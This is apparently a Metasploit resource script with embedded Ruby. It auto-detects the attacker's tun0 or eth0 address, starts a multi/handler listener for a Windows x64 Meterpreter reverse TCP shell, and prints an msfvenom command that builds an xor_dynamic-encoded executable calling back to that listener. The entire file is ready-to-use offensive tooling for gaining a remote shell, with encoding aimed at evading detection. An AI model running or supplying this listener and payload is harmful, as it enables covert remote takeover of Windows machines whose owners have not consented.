<ruby>
PAYLOAD = 'windows/x64/meterpreter_reverse_tcp'

def payload_lhost
  tun0_ip = %x(ip addr show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1).strip
  if tun0_ip.empty?
    %x(ip addr show eth0 | grep "inet " | awk '{print $2}' | cut -d/ -f1).strip
  else
    tun0_ip
  end
end

def payload_lport
  framework.datastore['LPORT'] || 80
end



print_status("#{PAYLOAD}'s LHOST=#{payload_lhost}, LPORT=#{payload_lport}")
run_single('use exploit/multi/handler')
run_single("set payload #{PAYLOAD}")
run_single("set lhost #{payload_lhost}")
run_single("set lport #{payload_lport}")
run_single('set exitonsession false')

puts ">>> To run:"
puts "> exploit -j -z"
puts ">>> venom command:"
puts "msfvenom -p #{PAYLOAD} LHOST=#{payload_lhost} LPORT=#{payload_lport} -f exe -e x64/xor_dynamic -o tcp.#{payload_lport}.exe"

sleep(1)
</ruby>
